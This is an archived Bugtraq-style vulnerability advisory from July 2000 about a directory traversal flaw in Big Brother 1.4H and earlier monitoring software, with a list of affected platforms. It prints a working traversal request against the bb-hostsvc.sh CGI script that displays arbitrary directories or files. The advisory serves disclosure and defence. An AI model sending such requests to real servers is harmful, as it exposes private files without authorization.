BB4 Technologies Big Brother Directory Traversal Vulnerability

Bugtraq ID:	1455
Class:	Access Validation Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Jul 11 2000 12:00AM
Updated:	Jul 11 2000 12:00AM
Credit:	Posted to Bugtraq on July 11, 2000 by Eric Hines <[email protected]>.
Vulnerable:	Sean MacGuire Big Brother 1.4 H - Apple Mac OS 8 8.6 - Apple Mac OS 9 9.0 - FreeBSD FreeBSD 5.0 - FreeBSD FreeBSD 4.0 - FreeBSD FreeBSD 3.5 - FreeBSD FreeBSD 3.4 - HP HP-UX 11.0 4 - HP HP-UX 11.0 - HP HP-UX 10.34 - HP HP-UX 10.30 - Linux kernel 2.3 .x - Linux kernel 2.2 .x - Microsoft Windows NT 4.0 - NetBSD NetBSD 1.4.2 x86 - NetBSD NetBSD 1.4.1 x86 - Novell Netware 5.1 - Novell Netware 5.0 - OpenBSD OpenBSD 2.7 - SGI IRIX 6.5 - SGI IRIX 6.4 - SGI IRIX 6.3 - SGI IRIX 5.3 - Sun Solaris 8_x86 - Sun Solaris 8_sparc - Sun Solaris 7.0_x86 - Sun Solaris 7.0 Sean MacGuire Big Brother 1.4 g Sean MacGuire Big Brother 1.4 Sean MacGuire Big Brother 1.3 Sean MacGuire Big Brother 1.2 Sean MacGuire Big Brother 1.1 Sean MacGuire Big Brother 1.0 9d Sean MacGuire Big Brother 1.0 9c Sean MacGuire Big Brother 1.0 9b Sean MacGuire Big Brother 1.0
Not Vulnerable:	Sean MacGuire Big Brother 1.4 h2

BB4 Technologies Big Brother Directory Traversal Vulnerability

Versions 1.4H and prior of BB4 Big Brother are susceptible to a directory traversal vulnerability which would allow a remote user to view the contents of any directory or file on the system. Executing a GET request for:

http://target/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../directory

will display the contents of the specified directory.

BB4 Technologies Big Brother Directory Traversal Vulnerability

http://target/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../directory